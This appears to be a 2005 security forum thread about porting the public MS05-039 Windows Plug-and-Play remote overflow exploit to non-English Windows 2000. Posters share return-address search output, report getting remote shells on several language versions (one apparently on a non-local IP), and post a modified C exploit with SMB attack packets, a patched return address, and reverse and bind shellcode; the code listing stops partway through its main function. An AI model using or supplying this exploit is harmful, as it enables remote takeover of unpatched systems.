pita
Aug 16 2005, 08:45 AM
Like some of you, the exploits published last week were not working on my Windows 2k server with French language, so I thought we need to make some modification on the exploit code... Let's take the code of the houseofdabus exploit, as you can see in the code:
CODE
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x67\x15\x7a\x76" /* 0x767a1567 */
OK, so the ret he used was 0x767a1567 in umpnpmgr.dll, but on my Windows 2k I see with the sac.exe utility (http://rapidshare.de/files/4030656/sac.zip.html):
sac.exe -r XPRET -d umpnpmgr.dll
(XPRET in the sac utility is for pop pop retn)
CODE
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x76741567 pop reg, pop reg, ret
0x76743827 pop reg, pop reg, ret
0x767438F6 pop reg, pop reg, ret
Search end. Found 3 addr.
So the ret for my Windows 2k French isn't the same... not so universal :/ So I thought: the hole is in services.exe, so maybe we could use a pop pop retn in services.exe:
sac.exe -r XPRET -d services.exe
CODE
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x10030CB pop reg, pop reg, ret
0x10037D6 pop reg, pop reg, ret
0x100B112 pop reg, pop reg, ret
0x100DD5B pop reg, pop reg, ret
0x100E2C5 pop reg, pop reg, ret
0x100E2F8 pop reg, pop reg, ret
0x1013761 pop reg, pop reg, ret
0x1013C79 pop reg, pop reg, ret
Search end. Found 8 addr.
Yeah, it smells good, let's see on a Windows 2k with English language... sac.exe blahblahblah and yes, we found it!
CODE
0x1013C79 pop reg, pop reg, ret
So now let's modify the code. In place of
CODE
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"\x67\x15\x7a\x76" /* 0x767a1567 */
I put
CODE
/* pop reg; pop reg; retn; - services.exe */
"\x79\x3C\x01\x01" /* 0x1013C79 */
Compile it..., let's see if the exploit works on my Windows 2k French language:
CODE
C:\>pnp 192.168.0.218 1060
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus :.
[*] connecting to 192.168.0.218:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.0.218:1060
c:\>nc 192.168.0.218 1060
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>oops...
So here we are, we now have a working exploit over (I hope, but not tested) all languages.
MpR
Aug 16 2005, 09:58 AM
Well, as per any first reply I've seen tonight strolling through this fine forum... How do I...??? Where can I...??? What does...??? Google what...??? Give me this. Give me that... No seriously now, thanks a lot for sharing what you found, man. I was actually playing with a Chinese copy trying to see what I could do, but man, try reading that when you're not used to it lol... After a few more pots of coffee tonight and some more sleep deprivation I may have to experiment with your theory of things. Best of luck.
nolimit
Aug 16 2005, 10:20 AM
Well done. I forget, this is still usable in XP/2k3 with an established share, right? Might be worthwhile to try for an OS independent exploit. Check the SEH placement across the OSes, it's not uncommon for them to shift.
Pir
Aug 16 2005, 11:57 AM
Very nice pita! Works.
Tested on German version.
Just a question: what to replace on the first exploit??
//Edit: Friend tested on Russian version.
[*] connecting to 192.168.0.5:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.0.5:6666
^C
C:\>nc 192.168.0.5 6666
Microsoft Windows 2000 [Версия 5.00.2195]
(С) Корпорация Майкрософт, 1985-2000.
C:\WINNT\system32>
EviL
Aug 16 2005, 01:37 PM
QUOTE(pita @ Aug 16 2005, 08:45 AM) Like some of you, the exploits published last week were not working on my Windows 2k server with French language, so I thought we need to make some modification on the exploit code... [full post quoted above]
Nice work pita, I've tried with .ru .de .it and it works.
Killaloop
Aug 16 2005, 01:40 PM
QUOTE(nolimit @ Aug 16 2005, 10:20 AM) Well done. I forget, this is still usable in XP/2k3 with an established share, right? Might be worthwhile to try for an OS independent exploit. Check the SEH placement across the OSes, it's not uncommon for them to shift.
This exploit uses SEH, which is registered on XPSP2/2K3; you would need to rewrite it so that it overwrites the complete SEH register. And for Win2k3 you would not only need to be authenticated, but also with an administrator account, which makes this quite useless.
stay
Aug 16 2005, 02:31 PM
When you want to test an exploit on different language versions of Windows, do you need each time the "real" version of the specified language/country, or is it enough to install the MUI (and change to the specified language)? On the one hand I can't imagine that Microsoft translates the different versions by changing hardcoded stuff; on the other hand, after my understanding, using a language file wouldn't change anything in the code itself. However, those addresses are memory addresses (correct me if I'm wrong...), therefore different language = different string would change memory, and therefore MUI should be enough?
Rafter
Aug 16 2005, 03:25 PM
As a matter of info, these are the results of the sac command line with different systems I have access to on my LAN:

Windows 2K SP4 Pro - German
sac - services.exe
CODE
D:\>sac -r XPRET -d services.exe
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x1008336 pop reg, pop reg, ret
0x1008B11 pop reg, pop reg, ret
0x100A7FE pop reg, pop reg, ret
0x100EECA pop reg, pop reg, ret
0x1010A21 pop reg, pop reg, ret
0x1010ED3 pop reg, pop reg, ret
0x1010F0D pop reg, pop reg, ret
0x1014D4E pop reg, pop reg, ret
Search end. Found 8 addr.
sac - umpnpmgr.dll
CODE
D:\>sac -r XPRET -d umpnpmgr.dll
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x76736A3D pop reg, pop reg, ret
0x76738D38 pop reg, pop reg, ret
0x76739282 pop reg, pop reg, ret
Search end. Found 3 addr.

Windows 2K SP4 Server - English
sac - services.exe
CODE
D:\>sac.exe -r XPRET -d services.exe
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x10030CB pop reg, pop reg, ret
0x10037D6 pop reg, pop reg, ret
0x100B112 pop reg, pop reg, ret
0x100DD5B pop reg, pop reg, ret
0x100E2C5 pop reg, pop reg, ret
0x100E2F8 pop reg, pop reg, ret
0x1013761 pop reg, pop reg, ret
0x1013C79 pop reg, pop reg, ret
Search end. Found 8 addr.
sac - umpnpmgr.dll
CODE
D:\>sac.exe -r XPRET -d umpnpmgr.dll
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x767A1567 pop reg, pop reg, ret
0x767A3827 pop reg, pop reg, ret
0x767A38F6 pop reg, pop reg, ret
Search end. Found 3 addr.

Windows XP SP2 Pro - German
sac - services.exe
CODE
D:\Temp\sac>sac.exe -r XPRET -d services.exe
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x100A919 pop reg, pop reg, ret
0x100B387 pop reg, pop reg, ret
0x100C721 pop reg, pop reg, ret
0x100C79A pop reg, pop reg, ret
0x100F841 pop reg, pop reg, ret
Search end. Found 5 addr.
sac - umpnpmgr.dll
CODE
D:\Temp\sac>sac -r XPRET -d umpnpmgr.dll
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x7585E552 pop reg, pop reg, ret
Search end. Found 1 addr.

Windows 2K3 SP1 - English
sac - services.exe
CODE
C:\>sac -r XPRET -d services.exe
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: services.exe
0x1006FC3 pop reg, pop reg, ret
0x10070E0 pop reg, pop reg, ret
0x100734A pop reg, pop reg, ret
0x10085BA pop reg, pop reg, ret
0x1008631 pop reg, pop reg, ret
0x100F43E pop reg, pop reg, ret
0x10123B6 pop reg, pop reg, ret
0x10124EA pop reg, pop reg, ret
0x1012522 pop reg, pop reg, ret
Search end. Found 9 addr.
sac - umpnpmgr.dll
CODE
C:\>sac -r XPRET -d umpnpmgr.dll
Search ASM Code Tool for Overflow exploit V0.20
Code by lion (lion@cnhonker.net)
Welcome to HUC website http://www.cnhonker.com
Search Mode or Register: XPRET
Start Search ASM Code in: umpnpmgr.dll
0x75773DEA pop reg, pop reg, ret
0x7577EFD9 pop reg, pop reg, ret
Search end. Found 2 addr.
MxMx
Aug 16 2005, 03:39 PM
Yess, really uber great. Tested on several win2k machines with other langs and it worked perfectly.
soundsearch
Aug 16 2005, 04:05 PM
Which code should I paste for Dutch OS?
Man, I always get this with all Windows exploits :S.
C:\>lol 213.23.***.89 1060
(MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow Universal Exploit + no crash shellcode
Copyright (c) 2005 .: houseofdabus :.
[*] connecting to 213.23.***.89:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 213.23.***.89:1060
C:\>nc 213.23.***.89 1060
C:\>
Yorn
Aug 16 2005, 05:42 PM
Very informative pita. Thanks for taking the time to look into this. I'm sure someone else has been, so in the interests of full-disclosure, it's good to know that more than just English versions are affected.
This should serve as fair warning to the rest of us network admins to get our laptops and etc updated ASAP. I know I have been looking into getting the stations I support patched quickly.
majestic
Aug 17 2005, 12:26 AM
It works great pita, great job. I just wanted to ask, does this exploit affect just WIN2K Pro, or every WIN2K?
pita
Aug 17 2005, 09:59 AM
QUOTE(majestic @ Aug 17 2005, 12:26 AM) It works great pita, great job. I just wanted to ask, does this exploit affect just WIN2K Pro, or every WIN2K?
As said in the advisory http://secunia.com/advisories/16372/
OS: Microsoft Windows 2000 Advanced Server, Microsoft Windows 2000 Datacenter Server, Microsoft Windows 2000 Professional, Microsoft Windows 2000 Server
rpm
Aug 17 2005, 10:20 AM
Anyone found a way to add multiple targets in?
pita
Aug 17 2005, 10:24 AM
I was bored this morning, so I thought why not make life easier; this is the houseofdabus exploit modified with the 0x1013C79 ret and a reverse shellcode added.
CODE
/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
 *
 * Copyright (c) 2005 houseofdabus.
 *
 * (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
 * Universal Exploit (0x01013C79) + reverse and bind shellcode
 *
 * .::[ houseofdabus ]::.
 *
 * ---------------------------------------------------------------------
 * Description:
 * A remote code execution and local elevation of privilege
 * vulnerability exists in Plug and Play that could allow an
 * attacker who successfully exploited this vulnerability to take
 * complete control of the affected system.
 *
 * This is a remote code execution and local privilege elevation
 * vulnerability. On Windows 2000, an anonymous attacker could
 * remotely try to exploit this vulnerability.
 *
 * On Windows XP Service Pack 1, only an authenticated user could
 * remotely try to exploit this vulnerability.
 * On Windows XP Service Pack 2 and Windows Server 2003, only an
 * administrator can remotely access the affected component.
 * Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
 * this is strictly a local privilege elevation vulnerability.
 * An anonymous user cannot remotely attempt to exploit this
 * vulnerability on Windows XP Service Pack 2 and Windows
 * Server 2003.
 *
 * ---------------------------------------------------------------------
 * Solution:
 * http://www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
 *
 * ---------------------------------------------------------------------
 * Systems Affected:
 * - Windows Server 2003, SP1
 * - Windows XP SP1, SP2
 * - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Tested on:
 * - Windows 2000 SP4
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 * Linux       : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
 *
 * [*] connecting to 192.168.0.22:445...ok
 * [*] null session...ok
 * [*] bind pipe...ok
 * [*] sending crafted packet...ok
 * [*] check your shell on 192.168.0.1:7777
 * Ctrl+C
 *
 * C:\>nc 192.168.0.1 7777
 *
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\WINNT\system32>
 *
 * ---------------------------------------------------------------------
 *
 * This is provided as proof-of-concept code only for educational
 * purposes and testing by authorized individuals with permission
 * to do so.
 *
 */
/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>   /* inet_addr() on non-Windows builds */
#endif
unsigned char SMB_Negotiate[] = "\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F" "\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02" "\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F" "\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70" "\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30" "\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54" "\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";
unsigned char SMB_SessionSetupAndX[] = "\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00" "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E" "\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00" "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00" "\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00" "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00" "\x2E\x00\x30\x00\x00\x00\x00\x00";
unsigned char SMB_SessionSetupAndX2[] = "\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00" "\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E" "\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46" "\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40" "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40" "\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48" "\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3" "\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00" "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00" "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00" "\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00" "\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";
unsigned char SMB_TreeConnectAndX[] = "\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";
unsigned char SMB_TreeConnectAndX_[] = "\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";
/* browser */ unsigned char SMB_PipeRequest_browser[] = "\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00" "\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" "\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00" "\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";
unsigned char SMB_PNPEndpoint[] = /* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */ "\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" "\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00" "\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11" "\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A" "\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
unsigned char RPC_call[] = "\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02" "\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00" "\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00" "\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00" "\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00" "\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00" "\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76"
/* jmp over - entry point */ "\xEB\x08\x90\x90"
/* pop reg; pop reg; retn; - services.exe (replaces the umpnpmgr.dll address 0x767a1567) */ "\x79\x3C\x01\x01" /* 0x1013C79 pop reg, pop reg, ret */
/* jmp ebx - umpnpmgr.dll "\x6f\x36\x7a\x76" */
"\xEB\x08\x90\x90\x67\x15\x7a\x76" "\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
unsigned char RPC_call_end[] = "\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";
unsigned char reverse_shellcode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9" "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D" "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA" "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32" "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10" "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8" "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66" "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5" "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8" "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A" "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12" "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A" "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C" "\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33" "\xF9\x7E\xE0\x5F\xE0";
unsigned char bind_shellcode[] = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19" "\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8" "\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc" "\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae" "\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f" "\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc" "\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc" "\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67" "\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7" "\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35" "\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64" "\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6" "\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f" "\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e" "\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60" "\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67" "\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a" "\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8" "\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66" "\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7" "\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57" "\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";
#define SET_PORTBIND_PORT(buf, port) \
    *(unsigned short *)(((buf)+186)) = (port)

/* Write name into out as little-endian UTF-16 (no terminator). */
void convert_name(char *out, char *name)
{
    unsigned long len;

    len = strlen(name);
    out += len * 2 - 1;
    while (len--) {
        *out-- = '\x00';
        *out-- = name[len];
    }
}

int main(int argc, char **argv)
{
    struct sockaddr_in addr;
    struct hostent *he;
    int len;
    int sockfd;
    unsigned short smblen;
    unsigned short bindport;
    unsigned long ip;
    unsigned char tmp[1024];
    unsigned char packet[4096];
    unsigned char *ptr;
    char recvbuf[4096];

#ifdef _WIN32
    WSADATA wsa;
    WSAStartup(MAKEWORD(2,0), &wsa);
#endif

    printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
    printf("\t Universal Exploit (0x01013C79) + reverse and bind shellcode\n\n\n");
    printf("\t Copyright (c) 2005 .: houseofdabus :.\n\n\n");

    if (argc < 3) {
        printf("HOD-ms05039-pnp-expl.exe <host> <bindport> [connectback IP]\n");
        exit(0);
    }

    if ((he = gethostbyname(argv[1])) == NULL) {
        printf("[-] Unable to resolve %s\n", argv[1]);
        exit(0);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("[-] socket failed\n");
        exit(0);
    }

    addr.sin_family = AF_INET;
    addr.sin_port = htons(445);
    addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(addr.sin_zero), '\0', 8);

    printf("\n[*] connecting to %s:445...", argv[1]);
    if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed\n"); exit(0); }
    printf("ok\n");

    /* SMB negotiate + anonymous (null) session setup */
    printf("[*] null session...");
    if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); }

    if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); }
    len = recv(sockfd, recvbuf, 4096, 0);
    if (len <= 10) { printf("\n[-] failed\n"); exit(0); }

    if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); }
    len = recv(sockfd, recvbuf, 4096, 0);
    if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); }

    /* tree connect to \\host\IPC$ (share name built at runtime, so lengths are patched in) */
    ptr = packet;
    memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
    ptr += sizeof(SMB_TreeConnectAndX)-1;

    sprintf(tmp, "\\\\%s\\IPC$", argv[1]);
    convert_name(ptr, tmp);
    smblen = strlen(tmp)*2;
    ptr += smblen;
    smblen += 9;
    memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

    memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
    ptr += sizeof(SMB_TreeConnectAndX_)-1;

    smblen = ptr-packet;
    smblen -= 4;
    memcpy(packet+3, &smblen, 1);

    if (send(sockfd, packet, ptr-packet, 0) < 0) { printf("\n[-] send failed\n"); exit(0); }
    len = recv(sockfd, recvbuf, 4096, 0);
